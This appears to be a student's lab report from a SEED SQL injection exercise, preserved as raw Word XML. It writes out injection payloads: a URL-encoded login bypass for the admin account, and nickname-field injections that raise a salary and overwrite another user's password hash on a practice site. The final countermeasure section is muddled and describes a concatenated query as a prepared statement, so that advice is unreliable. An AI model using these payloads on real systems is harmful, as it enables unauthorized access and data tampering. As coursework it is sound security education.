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84526" w14:textId="77777777" w:rsidR="003D11AA" w:rsidRDefault="003D11AA" w:rsidP="00C41CEE">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12058027" w14:textId="77777777" w:rsidR="003D11AA" w:rsidRDefault="003D11AA" w:rsidP="00C41CEE">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67C88570" w14:textId="77777777" w:rsidR="003D11AA" w:rsidRDefault="003D11AA" w:rsidP="00C41CEE">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2091A5AD" w14:textId="77777777" w:rsidR="003D11AA" w:rsidRDefault="003D11AA" w:rsidP="00C41CEE">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C56FD6B" w14:textId="77777777" w:rsidR="003D11AA" w:rsidRDefault="003D11AA" w:rsidP="00C41CEE">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FC297C1" w14:textId="77777777" w:rsidR="003D11AA" w:rsidRDefault="003D11AA" w:rsidP="00C41CEE">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ABE5A18" w14:textId="6044F046" w:rsidR="00CA5990" w:rsidRDefault="00C41CEE" w:rsidP="00C41CEE">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Project 1 SQL Injection Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215924CF" w14:textId="72612C8A" w:rsidR="00C41CEE" w:rsidRDefault="00611D53" w:rsidP="00C41CEE">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>CIS</w:t>
      </w:r>
      <w:r w:rsidR="00C41CEE">
        <w:t xml:space="preserve"> 4</w:t>
      </w:r>
      <w:r>
        <w:t>360</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F6A1CC" w14:textId="6E1BB4A1" w:rsidR="003D11AA" w:rsidRDefault="003D11AA" w:rsidP="00C41CEE">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Francis Rukab and </w:t>
      </w:r>
      <w:r w:rsidRPr="003D11AA">
        <w:t>James Smith</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37ED7615" w14:textId="77777777" w:rsidR="003D11AA" w:rsidRDefault="003D11AA">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6CB2FF" w14:textId="5B85BFA2" w:rsidR="00611D53" w:rsidRDefault="00CE35FD" w:rsidP="00C41CEE">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00CE35FD">
        <w:lastRenderedPageBreak/>
        <w:t>Task 1: MySQL Console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35158231" w14:textId="2E10BC89" w:rsidR="00CE35FD" w:rsidRDefault="006700F0" w:rsidP="00B03902">
      <w:r>
        <w:t xml:space="preserve">Command entered: </w:t>
      </w:r>
      <w:r w:rsidR="00B03902">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00B03902">
        <w:t>“select * from credential where</w:t>
      </w:r>
      <w:r w:rsidR="00B03902">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B03902">
        <w:t>name=”Alice”;</w:t>
      </w:r>
      <w:r w:rsidR="00B03902">
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531DA0B8" w14:textId="55681C54" w:rsidR="00B03902" w:rsidRDefault="00B03902" w:rsidP="00B03902">
      <w:r>
        <w:t xml:space="preserve">Output: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1613952A" w14:textId="19AB6DF1" w:rsidR="00B03902" w:rsidRDefault="00CE6ED6" w:rsidP="00B03902">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FB1A74B" wp14:editId="06DE4FE3">
            <wp:extent cx="5943600" cy="385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- Get Familiar with SQL Statemen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C0C" w14:textId="0EC3975F" w:rsidR="00CE6ED6" w:rsidRDefault="00CE6ED6" w:rsidP="00CE6ED6">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Task 2: SQL Injection Attack on SELECT Statement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0092D2EF" w14:textId="75F85CB8" w:rsidR="00CE6ED6" w:rsidRDefault="00CE6ED6" w:rsidP="00CE6ED6">
      <w:r>
        <w:t xml:space="preserve">Command entered: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540A02F1" w14:textId="34C1AF1B" w:rsidR="00CE6ED6" w:rsidRDefault="00932378" w:rsidP="00CE6ED6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00BAAD8D" wp14:editId="672FEDC6">
            <wp:extent cx="5943600" cy="2679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2.1- SQL Injection Attack from webpage - Command Enter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10D" w14:textId="6526B84F" w:rsidR="00932378" w:rsidRDefault="00932378" w:rsidP="00CE6ED6">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19799C52" w14:textId="5BE38EDE" w:rsidR="00932378" w:rsidRDefault="00993465" w:rsidP="00CE6ED6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="393B0A2B" wp14:editId="5E3CC1CC">
            <wp:extent cx="594360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2.1- SQL Injection Attack from webpage - Out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9BC" w14:textId="1B88D50F" w:rsidR="00993465" w:rsidRDefault="00B3274F" w:rsidP="00B3274F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Task 2.2: SQL Injection Attack from command line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B626289" w14:textId="19EDA591" w:rsidR="00B3274F" w:rsidRDefault="00E36E0B" w:rsidP="00B3274F">
      <w:r>
        <w:t>How command was discovered:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF55DBA" w14:textId="33522E02" w:rsidR="00E36E0B" w:rsidRDefault="00E36E0B" w:rsidP="00B3274F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BC99BAA" wp14:editId="62B0CA6A">
            <wp:extent cx="5943600" cy="291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 - SQL Injection Attack from command line - How command was discove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D2F9" w14:textId="500D9549" w:rsidR="00E36E0B" w:rsidRDefault="00E36E0B" w:rsidP="00B3274F">
      <w:r>
        <w:t>Command</w:t>
      </w:r>
      <w:r w:rsidR="003D5F7F">
        <w:t xml:space="preserve"> Entered: </w:t>
      </w:r>
      <w:r w:rsidR="000B6599" w:rsidRPr="000B6599">
        <w:t>http://www.seedlabsqlinjection.com/unsafe_home.php?username=%27or+Name%3D%27admin%27%3B%23&amp;Password=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB3E82F" w14:textId="12EAC9D0" w:rsidR="000B6599" w:rsidRDefault="000B6599" w:rsidP="00B3274F">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Output: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544CE769" w14:textId="0D0CE17F" w:rsidR="00BA47C2" w:rsidRDefault="00BA47C2" w:rsidP="00B3274F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="423370D2" wp14:editId="4AA9737F">
            <wp:extent cx="5943600" cy="3119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 - SQL Injection Attack from command line - Out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98EE" w14:textId="4EBF4B98" w:rsidR="000B6599" w:rsidRDefault="00830A05" w:rsidP="00830A05">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Task 2.3: Append a new SQL statement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC3E24F" w14:textId="7257443E" w:rsidR="00830A05" w:rsidRDefault="007B3A63" w:rsidP="004434DC">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">MySQL does not allow you to input multiple statements if the command was </w:t>
      </w:r>
      <w:r w:rsidR="00F12089">
        <w:t xml:space="preserve">generated from a php request. So, it is not possible to modify the data using the </w:t>
      </w:r>
      <w:r w:rsidR="004434DC">
        <w:t>web interface or using the command line with curl statements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E1F1C4" w14:textId="771AF638" w:rsidR="004434DC" w:rsidRDefault="004434DC" w:rsidP="004434DC">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Task 3: SQL Injection Attack on UPDATE Statement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6064C2D8" w14:textId="48B1369C" w:rsidR="004434DC" w:rsidRDefault="00FD322C" w:rsidP="00704298">
      <w:r>
        <w:t>Command Entered in Webpage Nickname Field</w:t>
      </w:r>
      <w:r w:rsidR="000C4025">
        <w:t xml:space="preserve"> of Alice</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00704298">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00704298" w:rsidRPr="00704298">
        <w:t>', salary='100000000' where EID='10000';#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B845C95" w14:textId="65C84154" w:rsidR="00704298" w:rsidRDefault="00704298" w:rsidP="00704298">
      <w:r>
        <w:t xml:space="preserve">Output from webpage: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4DDF49" w14:textId="1FFA18A3" w:rsidR="00704298" w:rsidRDefault="00704298" w:rsidP="00704298">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52FE3F4B" wp14:editId="2668DD2F">
            <wp:extent cx="5943600" cy="4608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3.1 - SQL Injection Attack on UPDATE Statement - Output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068" w14:textId="58E67AC8" w:rsidR="00704298" w:rsidRDefault="00704298" w:rsidP="00704298">
      <w:r>
        <w:t>Output from Command Line:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D013B0D" w14:textId="58EF1171" w:rsidR="00704298" w:rsidRDefault="00704298" w:rsidP="00704298">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="351D771D" wp14:editId="6D39AEAD">
            <wp:extent cx="5943600" cy="601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3.1 - SQL Injection Attack on UPDATE Statement - Output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9C9" w14:textId="24D69323" w:rsidR="00704298" w:rsidRDefault="000C4025" w:rsidP="007D7589">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>3.2: SQL Injection Attack on UPDATE Statement — modify other people’ password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C46C60" w14:textId="77777777" w:rsidR="00C85EB3" w:rsidRDefault="000C4025" w:rsidP="00C85EB3">
      <w:r>
        <w:t>Command Entered in Webpage Nickname Field</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of Ryan:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D75A3D" w14:textId="56A5AE75" w:rsidR="000C4025" w:rsidRDefault="00C85EB3" w:rsidP="00C85EB3">
      <w:r>
        <w:t>',</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Password='ab4f2bc4ec7f774752771ffef11a3c5cc8208800' where</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Name='Ryan';#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D229978" w14:textId="5EB18605" w:rsidR="00075508" w:rsidRDefault="00075508" w:rsidP="00C85EB3">
      <w:r>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6F63D4" w14:textId="097EB88E" w:rsidR="00075508" w:rsidRDefault="00075508" w:rsidP="00C85EB3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56E2AE1F" wp14:editId="2C33E15A">
            <wp:extent cx="5943600" cy="988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3.2 -  SQL Injection Attack on UPDATE Statement — modify other people password - Output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DF0C" w14:textId="4D1517E1" w:rsidR="00C23345" w:rsidRDefault="00C23345" w:rsidP="00C85EB3">
      <w:r>
        <w:t>Changing the password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D41DEB7" w14:textId="571E90D4" w:rsidR="00C23345" w:rsidRDefault="00C23345" w:rsidP="00C85EB3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="152084FB" wp14:editId="1E608620">
            <wp:extent cx="5943600" cy="1050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3.2 -  SQL Injection Attack on UPDATE Statement — modify other people password - Outpu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D6F" w14:textId="57E91428" w:rsidR="004B0008" w:rsidRDefault="009260F6" w:rsidP="004B0008">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Task 4: Countermeasure — Prepared Statement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B73519" w14:textId="127D1749" w:rsidR="009260F6" w:rsidRDefault="009260F6" w:rsidP="009260F6">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Replacing the value for name in the php document </w:t>
      </w:r>
      <w:r w:rsidR="000F57A1">
        <w:t xml:space="preserve">with the command </w:t>
      </w:r>
      <w:r w:rsidR="000F57A1">
        <w:t>SELECT * from credential WHERE name=’$name’ and password=’$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000F57A1">
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000F57A1">
        <w:t>’;</w:t>
      </w:r>
      <w:r w:rsidR="000F57A1">
        <w:t xml:space="preserve"> does </w:t>
      </w:r>
      <w:r w:rsidR="00586CCA">
        <w:t xml:space="preserve">not allow </w:t>
      </w:r>
      <w:r w:rsidR="00F522A5">
        <w:t xml:space="preserve">for an attack on the data. This method will not work because the data is passed after the statement is run. </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00926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C8"/>
    <w:rsid w:val="00075508"/>
    <w:rsid w:val="000B6599"/>
    <w:rsid w:val="000C4025"/>
    <w:rsid w:val="000F57A1"/>
    <w:rsid w:val="001A087D"/>
    <w:rsid w:val="002123C8"/>
    <w:rsid w:val="0039464E"/>
    <w:rsid w:val="003D11AA"/>
    <w:rsid w:val="003D5F7F"/>
    <w:rsid w:val="004434DC"/>
    <w:rsid w:val="004B0008"/>
    <w:rsid w:val="00586CCA"/>
    <w:rsid w:val="005A529C"/>
    <w:rsid w:val="00611D53"/>
    <w:rsid w:val="006700F0"/>
    <w:rsid w:val="00704298"/>
    <w:rsid w:val="007B3A63"/>
    <w:rsid w:val="007C48DA"/>
    <w:rsid w:val="007D7589"/>
    <w:rsid w:val="00830A05"/>
    <w:rsid w:val="009260F6"/>
    <w:rsid w:val="00932378"/>
    <w:rsid w:val="00993465"/>
    <w:rsid w:val="00B03902"/>
    <w:rsid w:val="00B3274F"/>
    <w:rsid w:val="00B61A1E"/>
    <w:rsid w:val="00BA47C2"/>
    <w:rsid w:val="00C23345"/>
    <w:rsid w:val="00C41CEE"/>
    <w:rsid w:val="00C85EB3"/>
    <w:rsid w:val="00CA5990"/>
    <w:rsid w:val="00CE35FD"/>
    <w:rsid w:val="00CE6ED6"/>
    <w:rsid w:val="00E1671B"/>
    <w:rsid w:val="00E36E0B"/>
    <w:rsid w:val="00F12089"/>
    <w:rsid w:val="00F522A5"/>
    <w:rsid w:val="00FD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0D1A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{173DCDF5-F41E-4701-A86E-FFB9A5C48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65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Rukab, Francis</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Rukab, Francis</cp:lastModifiedBy>
  <cp:revision>37</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-10-18T01:37:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-10-18T02:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>